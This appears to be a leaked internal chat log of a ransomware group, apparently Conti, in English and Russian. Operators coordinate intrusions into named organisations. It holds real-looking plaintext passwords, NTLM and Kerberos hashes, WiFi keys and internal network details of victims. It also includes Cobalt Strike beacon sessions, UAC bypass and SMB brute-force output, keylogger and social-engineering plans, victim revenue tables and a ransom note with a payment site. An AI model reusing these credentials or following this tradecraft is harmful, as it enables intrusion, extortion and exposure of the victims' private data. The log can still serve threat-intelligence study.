. . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30) Physical Address. . . . . . . . . : 00-09-0F-FE-00-01 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter WiFi: Connection-specific DNS Suffix : Home Description . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2A DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0(Preferred) IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0(Preferred) Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:5ce0:5b5c:1236:fc08(Preferred) Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:a9ec:ba3a:d314:b55e(Preferred) Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.0.80(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, September 27, 2020 12:33:55 PM Lease Expires . . . . . . . . . Tuesday, September 29, 2020 9:42:09 AM Default Gateway . . . . . . . . fe80::7e4c:a5ff:fef9:c2a0%11 192.168.0.1 DHCP Server . . . . . . . . . . . : 192.168.0.1 DHCPv6 IAID . . . . . . . . . . : 201649459 DHCPv6 Client DUID. . . . . . . . : 00-01-00-25-72-B4-85-00-68-EB-67-1A-A2 DNS Servers . . . . . . . . . . . : fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0 192.168.0.1 NetBIOS over Tcpip. . . . . . . . : Enabled
```
`UKHOEVLT3156\Administrator faf5481720d381d2405ef4194ddb4770`
`MATCHES.COM\Louisad M@tches2020!!`
too big, that's why I wrapped it
if it fits in a message why wrap it in a file?)
```
URL : https://login.microsoftonline.com/common/login Username : louisa.davies@matchesfashion.com Password : Basil1234
```
most likely domain creds.
there's a session
you're screwed)
Morally I'm with you guys)
and we optimize actions to cut out the unnecessary and useless
well, finishing/reworking the whole hodgepodge of "working" stuff on my hard drive, roughly speaking
related to developing the full in-house toolkit we're building
I'll make one topical channel now, we can get distracted for half an hour for a little discussion
except user 7
yes
guys, is everyone here right now?
projecting the logic laid out in OUs and groups onto scan results from different points
try to understand the logic of placement of the "boxes" that block ports; it can be by physical location, by functional purpose, "by department", or just boxes between server and user segments
often in such networks there are many DCs and the subnets are isolated from each other, but the domain controllers are not, for replication to succeed
they are almost never put on "the technician's machine"
firewalls are placed on segments
look for a route
the right solution is administering the network firewalls that forbid inbound connections
and it's not a given it'll let it through anyway
that's unlikely to work because ntlm relay in its current state can only "hit" a machine other than the one the connection is initiated from
only with some kind of spoofing, so as not to just capture but actually relay the authentication from this machine
no way
and what does "inbound connections forbidden" mean? all ports closed? all ports?
but we still managed to inject into the session
into an "outbound" session?
I have a question, why not do it with a bind?
not yet
for now we're working in the ones we had, but if there are new ones we're waiting
nope)
nowhere?
seems there's no DA
and where's the DA there?
2 networks close to a dead end
are there sessions to work with?
a long time
How's itc?
Hi
Hi all
today the ceiling is another hour, we're preparing for the shortage of data, by lunch tomorrow
gentlemen, I need to step away on business; as I understand there's stuff to do; write, and if I can help or advise with anything I'll definitely advise when I'm back
https://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/
?
so grab a couple of the so-called techies' .pst files and done
mm, can't advise... I usually just downloaded the target mailboxes via EAC
@tl2 question on >3) mail server backup: so I've pulled in the server named `Exchange.rtpco.local`, I go into `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox` and download this stuff
ff we grabbed, but chrome we can't decrypt without the master key
grab the admins' browsers carefully, without cobalt sessions
carbon is nasty - a fact; also they don't have exchange, need to look for the mail
on #evo-com everything's ready except two NASes in a workgroup; they need to be found in the admins' browsers; so far we've only looked at the FS and FF there, since we didn't jump across any machines, worked from the dedic over the vpn. Carbon sees everything, so if we jump somewhere the countdown starts and it has to be closed the same day. And the time there is -11, so we need to start around 9-10 in the morning.
today in theory from three
they haven't come yet
that's for @user3 and @user9, I think they're working with this network
on #evo-com what's the situation?
hi, on #rtpcompany-com a bunch of esxi were found that weren't detected last time, and creds for them; what's left, it seems, is to finish the additional tasks (sql, exch, etc). On #waterway-com we still haven't snagged the creds for the nimbles, they apparently really pass them around on paper; there's a keylogger on the IT guys, one of them on Friday tried and couldn't log into the nimble, then went into lastpass and locked himself out there
tell me what progress there was at the end of last week on the current tasks
@tl1 is absent today - so I'm filling in
hi all
for now yes
no way to break through? gave up on this network for now?
`USIDgfs867gfusydkGTTKJUg`
ready
build?
cobalts we'll stress later
+
I think until about 3 we'll research the network some more and then we can start
then we'll close today
nope, not connected in veeam
software-wise nothing besides veeam
didn't find cloud solutions?
how about clouds?
okay
yes
and actually we don't need it that much
look at all the hosts? we found two and two are being backed up in veeam as well
[ ](https://mediaeveryone.com/group/overland-com?msg=5QfnebYASzT2PbuXp) scanned the subnets, no hints of a center there
also `TESTLAB-PACKV9` but it can't be reached at all
I came across these boxes
```
TEST044-R002V9 TEST044-R002
```
for linux there seems to be a way...
is there a way to determine from a guest box which host it's running on?
maybe vcenter is outside the domain, did you look at everything?
```
https://10.69.0.51/restgui/start.html
```
basically there's apparently no management center for the hyper-v hosts; just two hosts, 34 VMs running on them, about half powered on; per AD there are 76 servers, haven't pinged them yet but it feels like just as few are alive; they back up to diskstation (10.69.0.22), mainly the file dump and sometimes servers. no other backups visible yet
```
http://10.69.0.90:5000/
```
as usual)
yeah already figured it out, was only looking at ` Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),`
so it doesn't exist
Reply from 10.69.201.15: Destination host unreachable.
```
beacon> shell ping 10.69.201.21 [*] Tasked beacon to run: ping 10.69.201.21 [+] host called home, sent: 49 bytes [+] received output: Pinging 10.69.201.21 with 32 bytes of data: Reply from 10.69.201.15: Destination host unreachable. Reply from 10.69.201.15: Destination host unreachable. Reply from 10.69.201.15: Destination host unreachable. [+] received output: Reply from 10.69.201.15: Destination host unreachable. Ping statistics for 10.69.201.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
[ ](https://mediaeveryone.com/group/overland-com?msg=mwdZmFecWDkt7TjDc) From the same subnet
[ ](https://mediaeveryone.com/group/overland-com?msg=Xfgnbd6C2RFa7d3Wo)
```
beacon> shell ping -n 1 10.69.201.21 [Tasked beacon to run: ping -n 1 10.69.201.21 [+] host called home, sent: 53 bytes [+] received output: Pinging 10.69.201.21 with 32 bytes of data: Reply from 10.69.201.15: Destination host unreachable. Ping statistics for 10.69.201.21: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```
and where are you pinging from
give the ping response
but what's the point of a portscan then?)
yes
[ ](https://mediaeveryone.com/group/overland-com?msg=2CWKmH8yR33F2viCj) didn't understand the question?
Will telnet show that port 22 is open if you do telnet server_name 22? I think it will
```
beacon> portscan 10.69.201.21 445,443,5000 icmp 1024 [*] Tasked beacon to scan ports 445,443,5000 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete beacon> portscan 10.69.201.21 22 icmp 1024 [*] Tasked beacon to scan ports 22 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete beacon> portscan 10.69.201.21 80 icmp 1024 [*] Tasked beacon to scan ports 80 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete beacon> portscan 10.69.201.21 1-1000 icmp 1024 [*] Tasked beacon to scan ports 1-1000 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete beacon> portscan 10.69.201.21 1001-5000 icmp 1024 [*] Tasked beacon to scan ports 1001-5000 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete beacon> portscan 10.69.201.21 5001-10000 icmp 1024 [*] Tasked beacon to scan ports 5001-10000 on 10.69.201.21 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete
```
give the ping response
and is 22 open for telnet?)
I don't remember how I did it, in my case there's no ping on the ip.
of course you can check with telnet) You can't hide from it, I think)
ping replies can also be disabled inside the system's own settings
why's that?
In my opinion it shouldn't ping in that case
maybe no open ports from the scan point
Strange ip, no open ports 10.69.201.21
http://10.69.0.22:5000/ nas with backups (admin:CR@CKer$) the fs is visible from DA
this password is for the admin account from both domains
`CR@CKer$`
there are none
send the dcsyncs from these domains too please
All alive ovrecomm.com
```
OVRECOMMAD01.ovrecomm.com ovrdb2.ovrecomm.com ovrdb1.ovrecomm.com OVRECOMMAD02.ovrecomm.com OVRDB1A.ovrecomm.com OVRSCDB1.ovrecomm.com
```
All alive ovrweb.com
```
OVRWEBAD01.ovrweb.com ovrweb1.ovrweb.com rweb2.ovrweb.com OVRWEBAD2.ovrweb.com OVRWEBAD02.ovrweb.com OVRWEB2A.ovrweb.com OVRWEB1A.ovrweb.com OVRSCWeb1.ovrweb.com OVRSCWeb2.ovrweb.com OVRSCWeb3.ovrweb.com
```
no
any questions on the tasks?
+
it landed
+
and you'll have all 3
then one more will land from another domain
+
do you still have my first session?
nullpin.com
domain)
cobalt or domain?
give the cobalt
move quietly too, don't pull sessions from all pcs, you can re-dump AD and check host availability
and don't dump dcsync and hashes there
good night
Till tomorrow
ok, till tomorrow
tomorrow by 6 I'll give 2 more domains to look at
we'll do a final check of everything here and close fully
then we'll move the closing to tomorrow
okay then
apparently died
```
dn:CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >objectClass: computer >cn: SYSTEMCENTER >distinguishedName: CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com >instanceType: 4 >whenCreated: 20190613140038.0Z >whenChanged: 20201117102629.0Z >uSNCreated: 36464435 >uSNChanged: 46733431 >name: SYSTEMCENTER >objectGUID: {11A33782-FF53-4D61-B6ED-92C585B680CC} >userAccountControl: 4096 >badPwdCount: 0 >codePage: 0 >countryCode: 0 >badPasswordTime: 0 >lastLogoff: 0 >lastLogon: 132502892466357264 >localPolicyFlags: 0 >pwdLastSet: 132498579429186892 >primaryGroupID: 515 >objectSid: S-1-5-21-917468999-1386106184-2076119496-6860 >accountExpires: 9223372036854775807 >logonCount: 439 >sAMAccountName: SYSTEMCENTER$ >sAMAccountType: 805306369 >operatingSystem: Windows Server 2016 Standard >operatingSystemVersion: 10.0 (14393) >dNSHostName: SystemCenter.overland.com >servicePrincipalName: WSMAN/SystemCenter.overland.com >servicePrincipalName: WSMAN/SystemCenter >servicePrincipalName: TERMSRV/SystemCenter.overland.com >servicePrincipalName: TERMSRV/SYSTEMCENTER >servicePrincipalName: RestrictedKrbHost/SYSTEMCENTER >servicePrincipalName: HOST/SYSTEMCENTER >servicePrincipalName: RestrictedKrbHost/SystemCenter.overland.com >servicePrincipalName: HOST/SystemCenter.overland.com >objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=overland,DC=com >isCriticalSystemObject: FALSE >dSCorePropagationData: 20200409185421.0Z >dSCorePropagationData: 20190731210520.0Z >dSCorePropagationData: 20190731210518.0Z >dSCorePropagationData: 16010101181633.0Z >lastLogonTimestamp: 132500823894234705 >msDS-SupportedEncryptionTypes: 28
```
```
Ping request could not find host SystemCenter.overland.com. Please check the name and try again.
```
in AD)
where did you see it?
what host is that?
SYSTEMCENTER
veeam console, cloud not connected
```
--- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : overland\administrator Credential : LastModified : 1/21/2016 8:52:52 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://login.microsoftonline.com/ Identity : azureadadmin@overlandsheepskin.onmicrosoft.com Credential : LastModified : 3/16/2018 6:46:12 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : administrator Credential : LastModified : 4/4/2017 7:35:39 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : todd@overland.com Credential : LastModified : 1/16/2019 3:56:37 PM
```
and we'll decide there what to do
then another half hour for checking
scanning the network for now
there are hyper-v servers there and no idea where vsphere is or whether it exists at all
Find vsphere, and re-check vspheres + there's a suspicion that 10.69.0.90:5000 is a nas but it's off
closing today?
`Elar1n22`
```
todd@mail.overland.com OVERLAND\todd Elar1n55
```
till tomorrow
okay, till tomorrow
Till tomorrow
so we can wrap up for today
u3
sessions died
1) look through the shares for interesting files and scripts containing other creds 2) brute the sa account on mssql servers with popular passwords 3) check network devices for access with default passwords (routers/switches)
what can be done?
@tl2 @tl1elevate не работаетЛА, а юак обходить не хочетдоменный, но ЛА на своей тачкене имею понятия, пустил брут, до сих пор идёт, это было в первых строкаха SBolley разве не доменный пользователь?DC ``` [+] 192.168.90.6:445 - 192.168.90.6:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.11.42:445 - 192.168.11.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.110.42:445 - 192.168.110.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 10.220.136.40:445 - 10.220.136.40:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.30.42:445 - 192.168.30.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.11.43:445 - 192.168.11.43:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 10.200.132.52:445 - 10.200.132.52:445 - Success: '.\SBolley:thisduckingsucks!02' ```user8user4user3https://www.exploit-db.com/exploits/3220`spoolsv.exe` вот такой процесс естьпоробуйте реализацию на шарпе что я скинул вышетакое может бытьполагаю алертит на необфусцированный пейлоад в б64 енкодеfodhelper на шарпе`` https://github.com/FatRodzianko/SharpBypassUAC ```ну и все отслаьыне тоже попробовали```` beacon> audit_uac [*] Tasked Beacon to audit UAC settings [+] host called home, sent: 149229 bytes [+] received output: [+] SBolley is a local Administrator! [Info] DETSBOLLEY23063 is Windows 10.0.18363. [+] Invoke-SluiBypass should work to bypass UAC. [+] Invoke-FodhelperBypass should work to bypass UAC. [+] Invoke-TokenDuplication should work to bypass UAC. 
``` ` Invoke-FodhelperBypass - блочится AV Invoke-SluiBypass - повесил сеиию Invoke-TokenDuplication - не работаетвсе elevate методы не помогли?не получается пройти уак, ищем какестьЖивые люди тут есть?и он ругается на закодированую команду, он ругается на параметр `-Command`для чего это вообще?Как продвигается?да, не трогайтеможете работатьприлетела`` >memberOf: CN=SQL Financial User: DBunte - IP Address: 192.168.90.2 User: Melissa - IP Address: 192.168.0.126 User: Melissa - IP Address: 192.168.0.28 User: srethmeier - IP Address: 192.168.0.124 User: achackes - IP Address: 192.168.0.61 ```пока нашёл только >memberOf: CN=SQL Financialищу у кого выигрышнее дёрнуть точечноэксч серва не нашёлтут подготовите завтра?ну и почтаб но это все надо прям в сети делатьмогу вам предложить завтра закрыть все 3)у нас и в \ evo почти все готово, кроме пары насовпоэтому эти обе готовимони туда не часто гоняютут смысла ждать нет у моря погодыв таком духенаписать чет мой пароль не подходита-ля "ты че дурак он у тебя на стикере на мониторе "чтобы все было готовоэто надо делать все в день закрытияон может всякое ответитьтут все в моменте)очень опаснои вылетаем сразуахас одного айтишника напишем другому какой пасс от нимблалибо попробуем СИплан такой, мы либо закроем без нимбла но надо даныеэта тожетут есть бэкап .pst одного айтишникалично я пока в приорите с #rtpcompany-com работаю, так как она ближе к закрытиюпомимо нимбла остальное готово? бэкапы и прочеепока ничеготут у нас что?И распишите себе mindmap по поднятию прав от ЛП до ДАНапишите в ЛС подробные отчеты о проделанной работе за последние 2-3 дня. Пока можете заняться организацией записей по модулям и прочему, так же написать себе мануал по всем векторам которые были и в каком порядке лучше действовать. 
Заканчиваем в 20:00 сегодняhttps://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-i-aktivnye-sessii-s-powershell/если работает нагрузка `beacon_reverse_tcp` в `Windows Executable (S)` который прошел через `shellConcatenation.1.0.0`, но при этом не работает через `rportfwd` скорее всего дело в самом `rportfwd`[ ](https://mediaeveryone.com/channel/general?msg=mQY8BtgM65Eh6Tpz6) а проверяли на обычном https листе? или уже на rportfwd?а чем не нравится `Attack -> Packages -> Payload Generator`?он в 255 раз большеДа, но не уверен, что сам `shellConcatenation.1.0.0` поддерживает такой размер файла RAW)а по поводу `rportfwd` не совсем понял ``` beacon> help rportfwd Use: rportfwd [bind port] [forward host] [forward port] rportfwd stop [bind port] Binds the specified port on the target host. When a connection comes in, Cobalt Strike will make a connection to the forwarded host/port and use Beacon to relay traffic between the two connections. ````Windows Executable (S) - RAW` - это stageless вариант, а именно когда вы делаете RAW через `Attack -> Packages -> Payload Generator` вы делаете промежуточный файл, который после запуска докачивает рабочий код самой кобы, в `Windows Executable` сразу этот рабочий код идет, без дополнительной подкачкиhiтогда до обеда работаем с ним все вместе+из сессий только MATCHES?Доброе утроВсем доброейчас спущусьВзглядомТелепатически? не испачкайтетолько аккуратно, она покрашенаБейте в дверь мощьно🗿Там забулдыгаДобра по утруБодрое утроувы( пока тихо(@tl2 по кербам тихо?(закреп не удавалось поставитьсессий нет`` otsql$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! ichiban$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! ``бвот керь`` $krb5tgs$23$*admbchapman$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! 
```сесии умерли?+и пересниму разомпо всемполный отчет потом отдайтут 2фа, есть возможность сессии переснять?`adm 76.14.0.148 redwoodcity.org 192kk user8`щас зайду)не)я уж думал он ушел в мертвые т к там совсем движухи нет)где? у нас же еще третий естьменя просто напрягает что в general постоянно пишутмогу зайти)ну и кстати тебя в другом нету)ну и плюс я не совсем отсюда)втч пиндосы)тут 99 людей знает и так откуда яой блятьа у нас концерты Дельфина набережной выставки диповых чуваков под кислотой водка под Дядю Юрув этом рокете лишнее пишида и такой эфективный иногда)а движняк где-то далеко)а тут не устал - налилэто в мск все там на пампе каком-то соревновательном уровне полном движнякеПривык что способмтвует)привык еще как)в том то и дело)разве не привык?)способствует)))как у нас всегда вцелом))у меня еще погода способствуетя тоже об этом подумываю в последнее время)но слишком стабильно прикладываюсь)и косяков нети даже все работаетне, я какбы тут все окейну с начала декабря ужехорошо ты отдохнул)пока функционирую надо ловить момент)поеду лечиться)если до конца месяца не соскочуслезтьникак не могу с бухлачета я всеокей)и в ночь все закроютзавтра придут к 6пусть сегодня заготовятвыспятсяскажем - будут сидетьпросто выспаться хотят)тебе жалуются?)спать хотят совсемребятотпускайтам хеш будетмодулем в мсфечем можно сдамнуть учетку sa?и тпш уже нетсколько лет назад)ну да ты вроде пусканулся ж туда не?сначала надо в сеть идтитак там из сетитут недавно)нарисовался никсовый 0д ЛПЕжив ли доступ на прод сервкакможешь на пейперсурс помотреть!!о кстати[еще этот пейперсурс ебучийесли там вебшелл вынеслиpens.com еще остался но надо ехе чтобы его пусканутьтам еще триадметалз вроде есть если бот в сети можете взять он бесхозныймогут заплатить могут не заплатить это рулетка ни от чего не зависит толкома они все в процесе...мне кажется нетпо сну они заплатят?все в работетам моих 4какие?еще ваши боты естьили вон на бекдореа смысл?снуеду сделай пока там работы пиздец копейка((чувак 
оффлайн пока будет к 22 где-то(я с ней поработаюдавай 2фа)))сделаеми скажи как остальные 3 переснять сессиину окей если что работайте егобыл на момент отчета, а потом ушли на другие задачи)написано же)IN PROGRESSнеа, в работе только текущиесун.еду работаете?там впна больше нет по ипаку этомуже отметилда вижуглобалтранз250 мимо205.236.0.43 204.134.196.195 107.0.14.250 по этим трем переснять сессии?`` EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research 205.236.0.43 user4 STOPPED no valid accounts snu.edu 204.126.2.44 user7 IN PROGRESS 204.134.196.195 user4 STOPPED 1 acc not valid, 1 acc 2fa 107.0.14.250 2fa globaltranz.com Globalnet.local 162.42.243.250 ERROR blocked `````` EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research ``показать им что нехуй сливатьсяпочему бы и нетлол, мб в хелсы камбек сделаем? он у нас соника был)спслюбуюпод 4.1она та же что и былакакую?эээможешь пока скинуть инстру по настройке кобы?я себе пометки сделаюраспиши плиз актуальное состояние еще раза что у с впнами теми которые соникволы?что то в работу есть?оверленд собирается каплямиага окей = )`` All of your files are currently encrypted. Backups were encrypted or deleted, same as Shadow Copies. If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN recover all of the encryptd data - we offer you to decrypt 2 random files of your choice completely free of charge. The faster you reply - the easier and cheaper it will be. 
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best ---BEGIN ID--- W2GzoYgyg5zZYaIAHs4u2MR6UaxLrzlsyRb8qzwHbzENpcIR8KkCR8gmXgaDryRo ---END ID--- ``так и так ужеприветтаргет просилв записке уберите все кроме чата и инуткрукций как туда попасть когда заказывать будешь билдыпривету нас их нету. и кейлогер не ставитсятут я хзпри подключении клиента фортика он просит логин и пароль на сколько помнюну или быстро вырубилисьпохоже нетпосле запуска команд интерфейсы поднялись?делал так ``` beacon> shell wmic nic get name, index [*] Tasked beacon to run: wmic nic get name, index [+] host called home, sent: 55 bytes [+] received output: Index Name 0 Microsoft Kernel Debug Network Adapter 1 Intel(R) Ethernet Connection (6) I219-V 2 Intel(R) Wi-Fi 6 AX200 160MHz 3 Microsoft Wi-Fi Direct Virtual Adapter 4 Fortinet Virtual Ethernet Adapter (NDIS 6.30) 5 Fortinet SSL VPN Virtual Ethernet Adapter 6 PPPoP WAN Adapter 7 WAN Miniport (SSTP) 8 WAN Miniport (IKEv2) 9 WAN Miniport (L2TP) 10 WAN Miniport (PPTP) 11 WAN Miniport (PPPOE) 12 WAN Miniport (IP) 13 WAN Miniport (IPv6) 14 WAN Miniport (Network Monitor) 15 Bluetooth Device (Personal Area Network) 16 Microsoft Wi-Fi Direct Virtual Adapter #2 17 Broadcom NetXtreme Gigabit Ethernet beacon> shell wmic path win32_networkadapter where index=4 call enable [*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable beacon> shell wmic path win32_networkadapter where index=5 call enable [*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable [+] host called home, sent: 174 bytes [+] received output: Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable() Method execution 
successful. Out Parameters: instance of __PARAMETERS { ReturnValue = 0; }; [+] received output: Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable() Method execution successful. Out Parameters: instance of __PARAMETERS { ReturnValue = 0; }; ```да вроде дисконект`` [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30) Connection Name: Ethernet 2 Status: Media disconnected [04]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 Status: Media disconnected `````` Windows IP Configuration Ethernet adapter Ethernet 3: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Ethernet adapter Ethernet: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Wireless LAN adapter Local Area Connection* 1: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Wireless LAN adapter Local Area Connection* 10: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Ethernet adapter Ethernet 2: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Wireless LAN adapter WiFi: Connection-specific DNS Suffix : IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0 IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0 Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10 Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:c889:fce9:a8e0:ab10 Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11 IPv4 Address. . . . . . . . . . . : 192.168.0.80 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . 
fe80::7e4c:a5ff:fef9:c2a0%11 192.168.0.1 `````` Host Name: UKHOEVLT3156 OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18362 N/A Build 18362 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: MatchesFashion Product ID: 00330-52356-69234-AAOEM Original Install Date: 11/29/2019, 12:10:04 PM System Boot Time: 9/18/2020, 9:20:23 AM System Manufacturer: HP System Model: HP EliteBook 830 G6 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1600 Mhz BIOS Version: HP R70 Ver. 01.02.01, 8/26/2019 Windows Directory: C:\windows System Directory: C:\windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-gb;English (United Kingdom) Input Locale: en-us;English (United States) Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 7,998 MB Available Physical Memory: 850 MB Virtual Memory: Max Size: 29,502 MB Virtual Memory: Available: 15,235 MB Virtual Memory: In Use: 14,267 MB Page File Location(s): C:\pagefile.sys Domain: matches.com Logon Server: N/A Hotfix(s): 5 Hotfix(s) Installed. [01]: KB4514359 [02]: KB4513661 [03]: KB4515383 [04]: KB4516115 [05]: KB4515384 Network Card(s): 4 NIC(s) Installed. 
[01]: Intel(R) Ethernet Connection (6) I219-V Connection Name: Ethernet Status: Media disconnected [02]: Intel(R) Wi-Fi 6 AX200 160MHz Connection Name: WiFi DHCP Enabled: Yes DHCP Server: 192.168.0.1 IP address(es) [01]: 192.168.0.80 [02]: fe80::7de6:b515:bbeb:89c0 [03]: fdb0:64:3df8:0:c889:fce9:a8e0:ab10 [04]: 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10 [05]: fdb0:64:3df8:0:7de6:b515:bbeb:89c0 [06]: 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0 [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30) Connection Name: Ethernet 2 Status: Media disconnected [04]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ```systeminfo и ipconfigпо поводу интерфейсовКакие еще идеи?Все службы в названиях которых есть fortinet - запущены. Виртуальные интерфейсы фортинета - включал. Бесполезно. Домен не появляется.``` SSID name: "rothbarguest" Cipher : None SSID name: "BA53LG" Cipher: CCMP Cipher: GCMP Key Content : pinkblind SSID name : "SKYCWVNA" Cipher : CCMP Cipher: GCMP Key Content : 81kwISrQXbTM SSID name : "home" Cipher : CCMP Cipher : GCMP Key Content : jake2210boy SSID name : "BT-NGAFJ8" Cipher : CCMP Cipher: GCMP Key Content : CM3NxJT63QDiLt SSID name : "BTHub5-K3M6" Cipher : CCMP Cipher : GCMP Key Content : 76cc939872 SSID name : "TALKTALK-ADE727" Cipher : CCMP Cipher : GCMP Key Content : AGWGA9W6 SSID name : "BT-68A2KJ" Cipher : CCMP Cipher : GCMP Key Content : VpHFa7NVYnKYub SSID name: "Elfordleigh" Cipher : CCMP Cipher: GCMP Key Content : Security12 SSID name : "SKY94FE2" Cipher : CCMP Cipher : GCMP Key Content : RBPXFQEA SSID name: "MF_Guest" Cipher: CCMP Cipher: GCMP Key Content : MatchNow `````` Louisad M@tches2020! 
yes
caught?
and what about me, can I get in there too
henrystreet.org, a channel please
by the end of the week we close out everything we have on hand and move to the new Rocket
skytechinc.com
@user9 - is preparing the network and still hasn't given me the external domain for the channel
@user7 - #corp-televisa-com-mx
@user8 - issued VPN
@user3 - issued VPN
@user4 - issued VPN
damn
so it died
Bally: keep monitoring it in the background
respect
harsh, as it turns out
no way he
@user9 is busy with the network, preparing it for the close
me - it definitely never came my way
did it?
yeah, seems it didn't
it wasn't set up on their Solar
a password manager
what's that?
#ballymoregroup-com: had creds for two NASes, one didn't work; 2 backup servers with listings pulled; were looking for vSphere; then it dropped the first time; came back, they shut down the first NAS too and changed passwords; dropped again; then a machine came back that has no access to the domain; from the VPN neither configs nor creds; a keylogger was running, caught nothing
did you check whether there is a password manager?
sccy: collected browsers from ALL computers, no passwords
we've been at them for several days now
on sccy and ballymore, report what has been done (a reminder: I can't turn on the VPN without a confirmation code, they have 2FA)
sccy was in work
session is alive
stepped away from the computer
Come on, I'm ready to take a new one
you mean he left?
if there's something to take, I'll take it; my guy left in #corp-televisa-com-mx
sccy
ballymore dropped
sccy
who has what in work?
uh-huh
+
everyone here?
ok, need a new one; sure that nobody from the office logged in either
me, but better change the cobalt
quite a few
for now it's me with user7, the rest are late
who actually showed up?
everyone at home, asleep
did you ask your people?
pawbug.com
and the domain?
mine
whose cobalt?
someone left
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
no
```
sup beacon> exit
[*] Tasked beacon to exit
```
@tl1 was it you who exited all the sessions in the cobalt 172....218?
hi
Hello everyone
hello
tomorrow by 5
login_passwd
login_username
in snu.edu I'm trying to get out of the VPN; checking for SMBGhost, and tried a whole bunch of RDP exploits - all missed
so how do you order salt on hydra )
I'm not familiar with hydra
I'm in #corp-televisa-com-mx trying to get onto some machine
@user9 went off for a long break
figuring out hydra
With hydra, how to brute-force web forms
or brute the web some other way
